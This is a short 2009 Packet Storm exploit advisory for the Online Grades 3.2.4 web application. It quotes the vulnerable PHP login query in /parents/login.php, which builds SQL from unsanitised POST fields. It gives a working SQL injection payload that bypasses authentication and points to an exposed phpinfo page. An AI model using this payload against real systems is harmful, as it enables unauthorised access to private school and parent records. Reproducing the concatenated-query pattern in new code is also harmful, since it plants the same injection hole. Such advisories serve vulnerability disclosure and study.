Online Grades 3.2.4 SQL Injection

2009-02-03T00:00:00
ID PACKETSTORM:74575
Type packetstorm
Reporter X0r
Modified 2009-02-03T00:00:00

Description

                                        
                                            `#########################################################################################  
  
[0x01] Informations:   
Script : Online Grades 3.2.4   
Download : http://www.onlinegrades.org   
Vulnerability : Auth Bypass - Php Info Disclosure   
Author : x0r   
Contact : x0r@live.it \ andry2000@hotmail.it   
Website : NULL   
  
#########################################################################################  
  
[0x02] Bug: /parents/login.php   
  
$username = $_POST['uname']; $pword = $_POST['pass'];   
$mysql_query = "SELECT * from PARENTS where client_id = '$username' and  
client_pw = '$pword';";   
  
#########################################################################################  
  
[0x03] Exploit:   
Exploit: [validemail] ' or ' 1=1--   
  
Php Info: /includes/phpinfo.php   
  
#########################################################################################  
  
  
`